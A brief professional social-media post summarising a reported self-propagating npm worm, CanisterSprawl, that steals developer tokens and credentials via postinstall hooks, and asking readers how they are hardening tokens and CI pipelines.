CanisterSprawl: self‑propagating supply‑chain worm infects npm and steals tokens

Colleagues, please note: cybersecurity researchers have identified a campaign dubbed CanisterSprawl — a self‑propagating worm that spreads via npm packages and exfiltrates developer tokens.
- Activates via postinstall hook; steals .npmrc, SSH keys, cloud credentials, Docker/K8s configs, .env files and browser/IDE extension data.
- Exfiltrated data is sent to an HTTPS webhook and an ICP canister; if tokens are present attackers publish poisoned package versions. There is PyPI‑targeting logic as well.
- JFrog and Wiz reported similar compromises and abuse of GitHub Actions (pull_request_target).
Why this matters: a single compromised environment can trigger chained infections and key leakage.
What measures are you strengthening to protect tokens and CI?
#cybersecurity #supplychain #npm #DevOps


Latest comments
No comments yet.